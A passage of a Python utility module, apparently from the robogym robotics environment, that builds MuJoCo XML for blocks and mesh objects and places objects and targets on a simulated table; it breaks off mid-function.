from collision import Poly, Vector, collide
from mujoco_py import MjSim, const
from numpy.random import RandomState
from robogym.mujoco.mujoco_xml import ASSETS_DIR, MujocoXML
from robogym.utils.env_utils import InvalidSimulationError
from robogym.utils.mesh import get_vertices_bounding_box, subdivide_mesh
from robogym.utils.misc import robogym_path
from robogym.utils.rotation import mat2quat, quat2mat, quat_conjugate, uniform_quat
MATERIAL_DIR = robogym_path("envs", "rearrange", "materials")
NumType = Union[int, float]
class PlacementArea(NamedTuple):
"""The offset of the placement area, which is in the lower left corner"""
offset: Tuple[float, float, float]
"""The full-size of the placement area (note that we do NOT use half-size convention here)"""
size: Tuple[float, float, float]
def recursive_dict_update(dictionary, update):
for k, v in update.items():
if isinstance(v, collections.abc.Mapping):
dictionary[k] = recursive_dict_update(dictionary.get(k, {}), v)
else:
dictionary[k] = v
return dictionary
def sample_group_counts(
random_state: RandomState, total: int, lam_low: float = 1.0, lam_high: float = 8.0
) -> List[int]:
"""
Sample a list of integers which sum up to `total`.
The probability of sampling an integer follows exponential decay, k ~ np.exp(-k * lam),
where lam is a hyperparam sampled from a range [lam_low, lam_high).
:param random_state: numpy random state
:param total: the expected sum of sampled numbers.
:param lam_low: lower bound for lambda in exponential decay.
:param lam_high: higher bound for lambda in exponential decay.
:return:
"""
current_max = total
counts = []
while current_max > 0:
candidates = range(1, current_max + 1)
lam = random_state.uniform(lam_low, lam_high)
probs = np.array([np.exp(-i * lam) for i in candidates])
probs /= sum(probs)
selected = random_state.choice(candidates, p=probs)
counts.append(selected)
current_max -= selected
assert sum(counts) == total
return counts
def stabilize_objects(mujoco_simulation, n_steps: int = 100):
"""
Stabilize objects.
"""
# Store original damping value for objects.
damping = mujoco_simulation.get_object_damping()
# Decrease damping value to make object stabilize faster.
mujoco_simulation.set_object_damping(1e-3)
# Step simulation to let object stabilize.
for _ in range(n_steps):
mujoco_simulation.step()
# Restore damping value.
mujoco_simulation.set_object_damping(damping)
mujoco_simulation.forward()
def make_openai_block(name: str, object_size: np.ndarray) -> MujocoXML:
""" Creates a block with OPENAI letters on it faces.
:param name: The name of the block
:param object_size: The size of the block (3-dimensional). This is half-size as per Mujoco
convention
"""
default_object_size = 0.0285
default_letter_offset = 0.0009
# scale face meshes properly
scale = object_size / default_object_size
letter_offset = default_letter_offset * scale
def to_str(x: np.ndarray):
return " ".join(map(str, x.tolist()))
face_pos = {
"top": {
"body": to_str(np.array([0, 0, object_size[2]])),
"geom": to_str(np.array([0, 0, -letter_offset[2]])),
},
"bottom": {
"body": to_str(np.array([0, 0, -object_size[2]])),
"geom": to_str(np.array([0, 0, letter_offset[2]])),
},
"back": {
"body": to_str(np.array([0, object_size[1], 0])),
"geom": to_str(np.array([0, -letter_offset[1], 0])),
},
"right": {
"body": to_str(np.array([object_size[0], 0, 0])),
"geom": to_str(np.array([-letter_offset[0], 0, 0])),
},
"front": {
"body": to_str(np.array([0, -object_size[1], 0])),
"geom": to_str(np.array([0, letter_offset[1], 0])),
},
"left": {
"body": to_str(np.array([-object_size[0], 0, 0])),
"geom": to_str(np.array([letter_offset[0], 0, 0])),
},
}
face_euler = {
"top": to_str(np.array([np.pi / 2, 0, np.pi / 2])),
"bottom": to_str(np.array([np.pi / 2, 0, np.pi / 2])),
"back": to_str(np.array([0, 0, np.pi / 2])),
"right": to_str(np.array([0, 0, 0])),
"front": to_str(np.array([0, 0, -np.pi / 2])),
"left": to_str(np.array([0, 0, np.pi])),
}
def face_xml(_name: str, _face: str, _c: str):
xml = f"""
<body name="{_face}:{_name}" pos="{face_pos[_face]['body']}">
<geom name="letter_{_c}:{_name}" mesh="{_name}{_c}" euler="{face_euler[_face]}"
pos="{face_pos[_face]['geom']}" type="mesh" material="{_name}letter"
conaffinity="0" contype="0" />
</body>
"""
return xml
size_string = " ".join(map(str, list(object_size)))
scale_string = " ".join(map(str, list(scale)))
xml_source = f"""
<mujoco>
<asset>
<material name="{name}letter" specular="1" shininess="0.3" rgba="1 1 1 1"/>
<mesh name="{name}O" file="{ASSETS_DIR}/stls/openai_cube/O.stl"
scale="{scale_string}" />
<mesh name="{name}P" file="{ASSETS_DIR}/stls/openai_cube/P.stl"
scale="{scale_string}" />
<mesh name="{name}E" file="{ASSETS_DIR}/stls/openai_cube/E.stl"
scale="{scale_string}" />
<mesh name="{name}N" file="{ASSETS_DIR}/stls/openai_cube/N.stl"
scale="{scale_string}" />
<mesh name="{name}A" file="{ASSETS_DIR}/stls/openai_cube/A.stl"
scale="{scale_string}" />
<mesh name="{name}I" file="{ASSETS_DIR}/stls/openai_cube/I.stl"
scale="{scale_string}" />
</asset>
<worldbody>
<body name="{name}">
<geom name="{name}" size="{size_string}" type="box"
rgba="0.0 0.0 0.0 0.0" material="block_mat"/>
<joint name="{name}:joint" type="free"/>
{face_xml(name, "top", "O")}
{face_xml(name, "bottom", "P")}
{face_xml(name, "back", "E")}
{face_xml(name, "right", "N")}
{face_xml(name, "front", "A")}
{face_xml(name, "left", "I")}
</body>
</worldbody>
</mujoco>
"""
return MujocoXML.from_string(xml_source)
def make_block(name: str, object_size: np.ndarray) -> MujocoXML:
"""Creates a block.
:param name: The name of the block
:param object_size: The size of the block (3-dimensional). This is half-size as per Mujoco
convention
"""
xml_source = f"""
<mujoco>
<worldbody>
<body name="{name}" pos="0.0 0.0 0.0">
<geom type="box" rgba="0.0 0.0 0.0 0.0" material="block_mat"/>
<joint name="{name}:joint" type="free"/>
</body>
</worldbody>
</mujoco>
"""
xml = MujocoXML.from_string(xml_source).set_objects_attr(
tag="geom", size=object_size
)
return xml
def make_blocks_and_targets(
num_objects: int, block_size: Union[float, np.ndarray], appearance: str = "standard"
) -> List[Tuple[MujocoXML, MujocoXML]]:
if isinstance(
block_size, (int, float, np.integer, np.floating)
) or block_size.shape == (1,):
block_size = np.tile(block_size, 3)
assert block_size.shape == (
3,
), f"Bad block_size: {block_size}, expected float, np.ndarray(1,) or np.ndarray(3,)"
if appearance == "standard":
make_block_fn = make_block
elif appearance == "openai":
make_block_fn = make_openai_block
xmls: List[Tuple[MujocoXML, MujocoXML]] = []
for i in range(num_objects):
# add the block
block_xml = make_block_fn(f"object{i}", block_size.copy())
xmls.append((block_xml, make_target(block_xml)))
return xmls
def get_combined_mesh(files: List[str]) -> trimesh.Trimesh:
return trimesh.util.concatenate(
[trimesh.load(os.path.join(ASSETS_DIR, "stls", file)) for file in files]
)
def make_mesh_object(name: str, files: List[str], scale: float) -> MujocoXML:
# Center mesh properly by offsetting with center position of combined mesh.
mesh = get_combined_mesh(files)
pos = -mesh.center_mass * scale
pos_string = " ".join(map(str, pos))
scale_string = " ".join(map(str, [scale] * 3))
assets = [
f'<mesh file="{file}" name="{name}-{idx}" scale="{scale_string}" />'
for idx, file in enumerate(files)
]
geoms = [
f'<geom type="mesh" mesh="{name}-{idx}" pos="{pos_string}"/>'
for idx in range(len(files))
]
assets_xml = "\n".join(assets)
geoms_xml = "\n".join(geoms)
xml_source = f"""
<mujoco>
<asset>
{assets_xml}
</asset>
<worldbody>
<body name="{name}" pos="0.0 0.0 0.0">
{geoms_xml}
<joint name="{name}:joint" type="free"/>
</body>
</worldbody>
</mujoco>
"""
return MujocoXML.from_string(xml_source)
def make_target(xml):
xml = deepcopy(xml)
xml = (
xml.remove_objects_by_tag("joint")
.add_name_prefix("target:", exclude_attribs=["material", "mesh", "class"])
.set_objects_attr(tag="geom", contype=0, conaffinity=0)
)
return xml
def get_all_vertices(sim, object_name, subdivide_threshold=None) -> np.ndarray:
"""
Return all vertices for given object.
:param sim: The MjSim instance.
:param object_name: The object name.
:param subdivide_threshold: If provided, subdivide mesh into smaller faces.
See subdivide_mesh for detail of this parameter.
:return: Array of all vertices for this object.
"""
all_verts: List[np.ndarray] = []
all_faces: List[Optional[np.ndarray]] = []
object_rot_mat = quat2mat(
quat_conjugate(mat2quat(sim.data.get_body_xmat(object_name)))
)
geom_ids = geom_ids_of_body(sim, object_name)
for geom_id in geom_ids:
pos = sim.model.geom_pos[geom_id]
quat = quat_conjugate(sim.model.geom_quat[geom_id])
mat = quat2mat(quat)
# Get all vertices associated with the current geom.
verts = get_geom_vertices(sim, geom_id)
faces = get_geom_faces(sim, geom_id)
# Translate from geom's to body's coordinate frame.
geom_ref_verts = verts @ mat
geom_ref_verts = pos + geom_ref_verts
all_verts.append(geom_ref_verts)
all_faces.append(faces)
if subdivide_threshold is not None and all(f is not None for f in all_faces):
# We can only subdivide mesh with faces.
mesh = trimesh.util.concatenate(
[
trimesh.Trimesh(vertices=verts, faces=faces)
for verts, faces in zip(all_verts, all_faces)
]
)
verts = subdivide_mesh(mesh.vertices, mesh.faces, subdivide_threshold)
else:
verts = np.concatenate(all_verts, axis=0)
return verts @ object_rot_mat
def get_geom_vertices(sim, geom_id):
geom_type = sim.model.geom_type[geom_id]
geom_size = sim.model.geom_size[geom_id]
if geom_type == const.GEOM_BOX:
dx, dy, dz = geom_size
return np.array(list(itertools.product([dx, -dx], [dy, -dy], [dz, -dz])))
elif geom_type in (const.GEOM_SPHERE, const.GEOM_ELLIPSOID):
if geom_type == const.GEOM_SPHERE:
r = [geom_size[0]] * 3
else:
r = geom_size[:3]
# https://stats.stackexchange.com/a/30622
vertices = []
phi = np.linspace(0, np.pi * 2, 20)
cos_theta = np.linspace(-1, 1, 20)
for p, c in itertools.product(phi, cos_theta):
x = np.sqrt(1 - c ** 2) * np.cos(p)
y = np.sqrt(1 - c ** 2) * np.sin(p)
z = c
vertices.append(np.array([x, y, z]))
return np.array(vertices) * r
elif geom_type in (const.GEOM_CYLINDER, const.GEOM_CAPSULE):
# We treat cylinder and capsule the same.
r, h = geom_size[0], geom_size[2]
points = np.array(
[[r * np.cos(x), r * np.sin(x), 0.0] for x in np.linspace(0, np.pi * 2, 50)]
)
return np.concatenate([points + h, points - h])
elif geom_type == const.GEOM_MESH:
return sim.model.mesh_vert[mesh_vert_range_of_geom(sim, geom_id)]
else:
raise AssertionError(f"Unexpected geom type {geom_type}")
def get_geom_faces(sim, geom_id):
if sim.model.geom_type[geom_id] != const.GEOM_MESH:
return None
data_id = sim.model.geom_dataid[geom_id]
face_adr = sim.model.mesh_faceadr[data_id]
face_num = sim.model.mesh_facenum[data_id]
return sim.model.mesh_face[range(face_adr, face_adr + face_num)]
def get_mesh_bounding_box(sim, object_name) -> Tuple[float, float]:
""" Returns the bounding box of a mesh body. If the block is rotated in the world frame,
the rotation is applied and the tightest axis-aligned bounding box is returned.
"""
all_verts = get_all_vertices(sim, object_name)
pos, size, _ = get_vertices_bounding_box(all_verts)
return pos, size
def get_block_bounding_box(sim, object_name) -> Tuple[float, float]:
""" Returns the bounding box of a block body. If the block is rotated in the world frame,
the rotation is applied and the tightest axis-aligned bounding box is returned.
"""
geom_ids = geom_ids_of_body(sim, object_name)
assert len(geom_ids) == 1, f"More than 1 geoms in {object_name}."
geom_id = geom_ids[0]
size = sim.model.geom_size[geom_id]
pos = sim.model.geom_pos[geom_id]
quat = quat_conjugate(mat2quat(sim.data.get_body_xmat(object_name)))
pos, size = rotate_bounding_box((pos, size), quat)
return pos, size
class MeshGeom:
"""A little helper class for generating random mesh geoms."""
def __init__(
self,
mesh_path: str,
mesh: trimesh.Trimesh,
pos: np.array,
quat: np.array,
scale: np.array,
parent: Optional["MeshGeom"] = None,
):
self.mesh_path = mesh_path
self.mesh = mesh
self.pos = pos
self.quat = quat
self.scale = scale
self.parent = parent
self.children: List[MeshGeom] = []
def to_geom_xml(self, name: str, idx: int):
pos_str = " ".join([str(x) for x in self.pos])
quat_str = " ".join([str(x) for x in self.quat])
return f'<geom type="mesh" mesh="{name}:mesh-{idx}" name="{name}:geom-{idx}" pos="{pos_str}" quat="{quat_str}" />'
def to_mesh_xml(self, name: str, idx: int):
scale_str = " ".join([str(x) for x in self.scale])
return f'<mesh file="{self.mesh_path}" name="{name}:mesh-{idx}" scale="{scale_str}" />'
def min_max_xyz(self):
# We already applied the scaling and rotation to the mesh vertices, so we only need
# to apply the offset here.
transformed_vertices = self.pos + self.mesh.vertices
min_xyz = np.min(transformed_vertices, axis=0)
max_xyz = np.max(transformed_vertices, axis=0)
return min_xyz, max_xyz
def make_composed_mesh_object(
name: str,
primitives: List[str],
random_state: np.random.RandomState,
mesh_size_range: tuple = (0.01, 0.1),
attachment: str = "random",
object_size: Optional[float] = None,
) -> MujocoXML:
"""
Composes an object out of mesh primitives by combining them in a random but systematic
way. In the resulting object, all meshes are guaranteed to be connected.
:param name: The name of the resulting object.
:param primitives: A list of STL files that will be used as primitives in the provided order.
:param random_state: The random state used for sampling.
:param mesh_size_range: Each mesh is randomly resized (iid per dimension) but each side is
guaranteed to be within this size. This is full-size, not half-size.
:param attachment: How primitives are connected. If "random", the parent geom is randomly
selected from the already placed geoms. If "last", the geom that was place last is used.
:param object_size: If this is not None, the final object) will be re-scaled so that the longest
side has exactly object_size half-size. This parameter is in half-size, as per Mujoco
convention.
:return: a MujocoXML object.
"""
assert 0 <= mesh_size_range[0] <= mesh_size_range[1]
assert attachment in ["random", "last"]
def compute_pos_and_size(geoms):
min_max_xyzs = np.array([geom.min_max_xyz() for geom in geoms])
min_xyz = np.min(min_max_xyzs[:, 0, :], axis=0)
max_xyz = np.max(min_max_xyzs[:, 1, :], axis=0)
size = (max_xyz - min_xyz) / 2.0
pos = min_xyz + size
return pos, size
geoms: List[MeshGeom] = []
for i, mesh_path in enumerate(primitives):
# Load mesh.
mesh = trimesh.load(mesh_path)
# Scale randomly but such that the mesh is within mesh_size_range.
min_scale = mesh_size_range[0] / mesh.bounding_box.extents
max_scale = mesh_size_range[1] / mesh.bounding_box.extents
assert min_scale.shape == max_scale.shape == (3,)
scale = random_state.uniform(min_scale, max_scale) * random_state.choice(
[-1, 1], size=3
)
assert scale.shape == (3,)
scale_matrix = np.eye(4)
np.fill_diagonal(scale_matrix[:3, :3], scale)
# Rotate randomly.
quat = uniform_quat(random_state)
rotation_matrix = np.eye(4)
rotation_matrix[:3, :3] = quat2mat(quat)
# Apply transformations. Apply scaling first since we computed the scale
# in the original reference frame! In principle, we could also sheer the
# object, but we currently do not do this.
mesh.apply_transform(scale_matrix)
mesh.apply_transform(rotation_matrix)
if len(geoms) == 0:
pos = -mesh.center_mass
else:
if attachment == "random":
parent_geom = random_state.choice(geoms)
elif attachment == "last":
parent_geom = geoms[-1]
else:
raise ValueError()
# We sample 10 points here because sample_surface sometimes returns less points
# than we requested (unclear why).
surface_pos = trimesh.sample.sample_surface(parent_geom.mesh, 10)[0][0]
pos = parent_geom.pos + (surface_pos - mesh.center_mass)
geom = MeshGeom(mesh_path=mesh_path, mesh=mesh, pos=pos, quat=quat, scale=scale)
geoms.append(geom)
# Shift everything so that the reference of the body is at the very center of the composed
# object. This is very important.
off_center_pos, _ = compute_pos_and_size(geoms)
for geom in geoms:
geom.pos -= off_center_pos
# Ensure that the object origin is exactly at the center.
assert np.allclose(compute_pos_and_size(geoms)[0], 0.0)
# Resize object.
if object_size is not None:
_, size = compute_pos_and_size(geoms)
# Apply global scale (so that ratio is not changed and longest side is exactly
# object_size).
ratio = object_size / np.max(size)
for geom in geoms:
geom.scale *= ratio
geom.pos *= ratio
geoms_str = "\n".join([g.to_geom_xml(name, idx) for idx, g in enumerate(geoms)])
meshes_str = "\n".join([g.to_mesh_xml(name, idx) for idx, g in enumerate(geoms)])
xml_source = f"""
<mujoco>
<asset>
{meshes_str}
</asset>
<worldbody>
<body name="{name}" pos="0 0 0">
{geoms_str}
<joint name="{name}:joint" type="free"/>
</body>
</worldbody>
</mujoco>
"""
return MujocoXML.from_string(xml_source)
def geom_ids_of_body(sim: MjSim, body_name: str) -> List[int]:
object_id = sim.model.body_name2id(body_name)
object_geomadr = sim.model.body_geomadr[object_id]
object_geomnum = sim.model.body_geomnum[object_id]
return list(range(object_geomadr, object_geomadr + object_geomnum))
def mesh_vert_range_of_geom(sim: MjSim, geom_id: int):
assert sim.model.geom_type[geom_id] == const.GEOM_MESH
data_id = sim.model.geom_dataid[geom_id]
vert_adr = sim.model.mesh_vertadr[data_id]
vert_num = sim.model.mesh_vertnum[data_id]
return range(vert_adr, vert_adr + vert_num)
def mesh_face_range_of_geom(sim: MjSim, geom_id: int):
assert sim.model.geom_type[geom_id] == const.GEOM_MESH
data_id = sim.model.geom_dataid[geom_id]
face_adr = sim.model.mesh_faceadr[data_id]
face_num = sim.model.mesh_facenum[data_id]
return range(face_adr, face_adr + face_num)
def update_object_body_quat(sim: MjSim, body_name: str, new_quat: np.ndarray):
body_id = sim.model.body_name2id(body_name)
sim.model.body_quat[body_id][:] = new_quat.copy()
def _is_valid_proposal(o1_x, o1_y, object1_index, bounding_boxes, placements):
o1_x += bounding_boxes[object1_index, 0, 0]
o1_y += bounding_boxes[object1_index, 0, 1]
# Check if object collides with any of already placed objects. We use half-sizes,
# but collision uses full-sizes. That's why we multiply by 2x here.
o1_w, o1_h, _ = bounding_boxes[object1_index, 1]
object1 = Poly.from_box(Vector(o1_x, o1_y), o1_w * 2.0, o1_h * 2.0)
for object2_index in range(len(placements)):
# Don't care about z placement
o2_x, o2_y, _ = placements[object2_index]
o2_x += bounding_boxes[object2_index, 0, 0]
o2_y += bounding_boxes[object2_index, 0, 1]
# Don't care about object depth.
o2_w, o2_h, _ = bounding_boxes[object2_index, 1]
object2 = Poly.from_box(Vector(o2_x, o2_y), o2_w * 2.0, o2_h * 2.0)
if collide(object1, object2):
return False
return True
def _place_objects(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
get_proposal: Callable[[int], Tuple[NumType, NumType]],
max_placement_trial_count: int,
max_placement_trial_count_per_object: int,
run_collision_check: bool = True,
) -> Tuple[np.ndarray, bool]:
"""
Wrapper for _place_objects_trial() function. Call _place_object_trial() multiple times until it
returns a valid placements. The _place_objects_trial() function can be called for
`max_placement_trial_count` times.
"""
assert max_placement_trial_count >= 1
assert max_placement_trial_count_per_object >= 1
for _ in range(max_placement_trial_count):
placements, is_valid = _place_objects_trial(
object_bounding_boxes,
table_dimensions,
placement_area,
get_proposal,
max_placement_trial_count_per_object,
run_collision_check,
)
if is_valid:
return placements, is_valid
return placements, False
def _place_objects_trial(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
get_proposal: Callable[[int], Tuple[NumType, NumType]],
max_placement_trial_count_per_object: int,
run_collision_check: bool = True,
) -> Tuple[np.ndarray, bool]:
"""
Place objects within rectangular boundaries with given get proposal function.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects.
:param get_proposal: Function to get a proposal of target position for given object. This
function takes in object index and return proposed (x, y) position.
:param max_placement_trial_count_per_object: If set, will give up re-generating new proposal
after this number is hit.
:param run_collision_check: If true, run collision to check if proposal is valid.
:return: np.ndarray of size (num_objects, 3) where columns are x, y, z coordinates of objects
relative to the world frame and boolean indicating whether the placement is valid.
"""
offset_x, offset_y, _ = placement_area.offset
width, height, _ = placement_area.size
table_pos, table_size, table_height = table_dimensions
def _get_global_placement(placement: np.ndarray):
return placement + [offset_x, offset_y, 0.0] - table_size + table_pos
# place the objects one by one, resampling if a collision with previous objects happens
n_objects = object_bounding_boxes.shape[0]
placements: List[Tuple[NumType, NumType, NumType]] = []
for i in range(n_objects):
placement_trial_count = 0
# Reference is to (xmin, ymin, zmin) of table.
prop_z = object_bounding_boxes[i, 1, -1] + 2 * table_size[-1]
prop_z -= object_bounding_boxes[i, 0, -1]
while True:
prop_x, prop_y = get_proposal(i)
placement = _get_global_placement(np.array([prop_x, prop_y, prop_z]))
b1_x, b1_y = placement[:2]
if not run_collision_check or _is_valid_proposal(
b1_x, b1_y, i, object_bounding_boxes, placements
):
break
placement_trial_count += 1
if placement_trial_count > max_placement_trial_count_per_object:
return np.zeros((n_objects, len(placement))), False
placements.append(placement)
return np.array(placements), True
def place_objects_in_grid(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
random_state: np.random.RandomState,
max_num_trials: int = 5,
) -> Tuple[np.ndarray, bool]:
"""
Place objects within rectangular boundaries by dividing the placement area into a grid of cells
of equal size, and then randomly sampling cells for each object to be placed in.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects.
:param random_state: numpy random state to use to shuffle placement positions
:param max_num_trials: maximum number of trials to run (a trial will fail if there is overlap
detected between any two placements; generally this shouldn't happen with this algorithm)
:return: Tuple[np.ndarray, bool], where the array is of size (num_objects, 3) with columns set
to the x, y, z coordinates of objects relative to the world frame, and the boolean
indicates whether the placement is valid.
"""
offset_x, offset_y, _ = placement_area.offset
width, height, _ = placement_area.size
table_pos, table_size, table_height = table_dimensions
def _get_global_placement(placement: np.ndarray):
return placement + [offset_x, offset_y, 0.0] - table_size + table_pos
# 1. Determine the number of rows and columns of the grid, based on the largest object width
# and height.
total_object_area = 0.0
n_objects = object_bounding_boxes.shape[0]
max_obj_height = 0.0
max_obj_width = 0.0
for i in range(n_objects):
# Bounding boxes are in half-sizes.
obj_width = object_bounding_boxes[i, 1, 0] * 2
obj_height = object_bounding_boxes[i, 1, 1] * 2
max_obj_height = max(max_obj_height, obj_height)
max_obj_width = max(max_obj_width, obj_width)
object_area = obj_width * obj_height
total_object_area += object_area
n_columns = int(width // max_obj_width)
n_rows = int(height // max_obj_height)
n_cells = n_columns * n_rows
cell_width = width / n_columns
cell_height = height / n_rows
if n_cells < n_objects:
# Cannot find a valid placement via this method; give up.
logging.warning(
f"Unable to fit {n_objects} objects into placement area with {n_cells} cells"
)
return np.zeros(shape=(n_objects, 3)), False
for trial_i in range(max_num_trials):
placement_valid = True
placements: List[Tuple[NumType, NumType, NumType]] = []
# 2. Initialize an array with all valid cell coordinates.
# Create an array of shape (n_rows, n_columns, 2) where each element contains the row,col
# coord
coords = np.dstack(np.mgrid[0:n_rows, 0:n_columns])
# Create a shuffled list where ever entry is a valid (row, column) coordinate.
coords = np.reshape(coords, (n_rows * n_columns, 2))
random_state.shuffle(coords)
coords = list(coords)
# 3. Place each object into a randomly selected cell.
for object_idx in range(n_objects):
row, col = coords.pop()
pos, size = object_bounding_boxes[object_idx]
prop_x = cell_width * col + size[0] - pos[0]
prop_y = cell_height * row + size[1] - pos[1]
# Reference is to (xmin, ymin, zmin) of table.
prop_z = object_bounding_boxes[object_idx, 1, -1] + 2 * table_size[-1]
prop_z -= object_bounding_boxes[object_idx, 0, -1]
placement = _get_global_placement(np.array([prop_x, prop_y, prop_z]))
b1_x, b1_y = placement[:2]
if not _is_valid_proposal(
b1_x, b1_y, object_idx, object_bounding_boxes, placements
):
placement_valid = False
logging.warning(f"Trial {trial_i} failed on object {object_idx}")
break
placements.append(placement)
if placement_valid:
assert (
len(placements) == n_objects
), "There should be a placement for every object"
break
return np.array(placements), placement_valid
def place_objects_with_no_constraint(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
max_placement_trial_count: int,
max_placement_trial_count_per_object: int,
random_state: np.random.RandomState,
) -> Tuple[np.ndarray, bool]:
"""
Place objects within rectangular boundaries without any extra constraint.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects
:param max_placement_trial_count: To prevent infinite loop caused by target placements,
max_placement_trial_count should set to a finite positive number.
:param max_placement_trial_count_per_object: To prevent infinite loop caused by target
placements, max_placement_trial_count_per_object should set to a finite positive number.
:param random_state: numpy RandomState to use for sampling
:return: np.ndarray of size (num_objects, 3) where columns are x, y, z coordinates of objects
relative to the world frame and boolean indicating whether if the proposal is valid.
"""
def _get_placement_proposal(object_idx):
# randomly place the object within the bounds
pos, size = object_bounding_boxes[object_idx]
offset_x, offset_y, _ = placement_area.offset
width, height, _ = placement_area.size
x, y = random_state.uniform(
low=(size[0], size[1]), high=(width - size[0], height - size[1])
)
x -= pos[0]
y -= pos[1]
return x, y
return _place_objects(
object_bounding_boxes,
table_dimensions,
placement_area,
_get_placement_proposal,
max_placement_trial_count,
max_placement_trial_count_per_object,
)
def place_targets_with_fixed_position(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
target_placements: np.ndarray,
):
"""
Place target object according to specified placement positions.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects
:param target_placements: Placement positions (x, y) relative to the placement area. Normalized
to [0, 1]
:return: Global placement positions (x, y, z) for all objects.
"""
def _get_placement_proposal(object_idx):
width, height, _ = placement_area.size
return target_placements[object_idx] * [width, height]
return _place_objects(
object_bounding_boxes,
table_dimensions,
placement_area,
_get_placement_proposal,
max_placement_trial_count=1,
max_placement_trial_count_per_object=1,
run_collision_check=False,
)
def place_targets_with_goal_distance_ratio(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
object_placements: np.ndarray,
goal_distance_ratio: float,
goal_distance_min: float,
max_placement_trial_count: int,
max_placement_trial_count_per_object: int,
random_state: np.random.RandomState,
) -> Tuple[np.ndarray, bool]:
"""
Place targets around objects with goal distance.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects
:param object_placements: placements of boxes - this is the result of place_objects
:param goal_distance_ratio: goal is uniformly sampled first and then distance beween the
object and the goal is shrinked. The shrinked distance is original distance times
goal_distance_ratio.
:param goal_distance_min: minimum goal distance to ensure that goal is not too close to the
object position.
:param max_placement_trial_count: To prevent infinite loop caused by target placements,
max_placement_trial_count should set to a finite positive number.
:param max_placement_trial_count_per_object: To prevent infinite loop caused by target
placements, max_placement_trial_count_per_object should set to a finite positive number.
:param random_state: numpy RandomState to use for sampling
:return: np.ndarray of size (num_objects, 3) where columns are x, y coordinates of objects
and boolean indicating whether if the proposal is valid.
"""
def _get_placement_proposal(object_idx):
# Sample goal position relative to table area
pos, size = object_bounding_boxes[object_idx]
offset_x, offset_y, _ = placement_area.offset
width, height, _ = placement_area.size
gx, gy = random_state.uniform(
low=(size[0], size[1]), high=(width - size[0], height - size[1])
)
# Retrieve object position relative to table area
table_pos, table_size, table_height = table_dimensions
object_place = (
object_placements[object_idx]
- [offset_x, offset_y, 0.0]
+ table_size
- table_pos
)
x = object_place[0] + pos[0]
y = object_place[1] + pos[1]
# Pull goal position close to the object position
dist = np.linalg.norm([gx - x, gy - y])
min_ratio = goal_distance_min / dist if dist >= goal_distance_min else 0.0
ratio = np.clip(goal_distance_ratio, min_ratio, 1.0)
gx = x + (gx - x) * ratio
gy = y + (gy - y) * ratio
return gx - pos[0], gy - pos[1]
return _place_objects(
object_bounding_boxes,
table_dimensions,
placement_area,
_get_placement_proposal,
max_placement_trial_count,
max_placement_trial_count_per_object,
)
def find_meshes_by_dirname(root_mesh_dir) -> Dict[str, list]:
"""
Find all meshes under given mesh directory, grouped by top level
folder name.
:param root_mesh_dir: The root directory name for mesh files.
:return: {dir_name -> list of mesh files}
"""
root_path = os.path.join(ASSETS_DIR, "stls", root_mesh_dir)
all_stls = {}
for subdir in os.listdir(root_path):
curr_path = os.path.join(root_path, subdir)
if not os.path.isdir(curr_path) and not curr_path.endswith(".stl"):
continue
if curr_path.endswith(".stl"):
stls = [curr_path]
else:
stls = glob.glob(os.path.join(curr_path, "*.stl"))
assert len(stls) > 0
all_stls[subdir] = stls
assert len(all_stls) > 0
return all_stls
def find_stls(mesh_dir) -> List[str]:
return glob.glob(os.path.join(mesh_dir, "**", "*.stl"), recursive=True)
def load_all_materials() -> List[str]:
"""
Return name for all material files under envs/rearrange/materials
"""
return [
os.path.splitext(os.path.basename(material_path))[0]
for material_path in glob.glob(os.path.join(MATERIAL_DIR, "*.jsonnet"))
]
# NOTE: Use lru_cache so that we don't have to re-compile materials files over and over
@lru_cache()
def load_material_args(material_name: str) -> dict:
"""
Load mujoco args related to given material.
"""
material_path = os.path.join(MATERIAL_DIR, f"{material_name}.jsonnet")
return json.loads(_jsonnet.evaluate_file(material_path))
def safe_reset_env(
env, max_reset_retry_on_invalid_sim_error=100, only_reset_goal=False
